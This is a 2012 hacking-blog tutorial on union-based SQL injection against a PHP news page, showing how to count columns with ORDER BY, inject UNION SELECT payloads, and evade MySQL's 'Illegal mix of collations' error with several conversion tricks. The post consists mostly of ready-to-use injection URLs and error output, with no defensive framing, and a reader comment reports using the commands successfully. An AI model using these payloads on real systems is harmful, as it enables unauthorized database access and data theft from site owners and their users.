BLACK BURN HACKER. Powered by Blogger.

Real Money Instantly

 

Monday, April 23, 2012

SQL Injection: Bypass "Illegal mix of collations" error

1 comments

Bypass "Illegal mix of collations" error


Here is my first tutorial to help the community, I hope it is helpful and sorry if my English is not good 

Immediately started counting the columns:
Code:
http://www.yoursite.com/news_dett.php?id=30+ORDER+BY+9--
column 9 we have the error "SQL Error : Unknown column '9' in 'order clause" then the columns are 8 

Proceed with a union based injection:
Code:
http://www.yoursite.com/news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,6,7,8--
in our case the columns 1,6,7,8 are vulnerable 

Proceed trying to find the version of MySQL:
Code:
http://www.yoursite.com/news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,version( ),7,8--
At this point our error appears:
Code:
SQL Error : Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
There are varous ways to bypass this error:
convert(version() using latin1)
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(@@version))
cast(version()+as+binary)
convert(version(),binary)
convert(version()+using+binary) 


example:
Code:
http://www.yoursite.com/news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,convert(version( ) using latin1) ,7,8--

©2012, copyright BLACK BURN

1 comments:

  1. Brilliant to say the least. I successfully bypass my SQLi using your commands.

    Thanks heaps,
    mothered.

    ReplyDelete

 

7 Years Earning Experience

The Earning Source You Can Trust

Follow by Email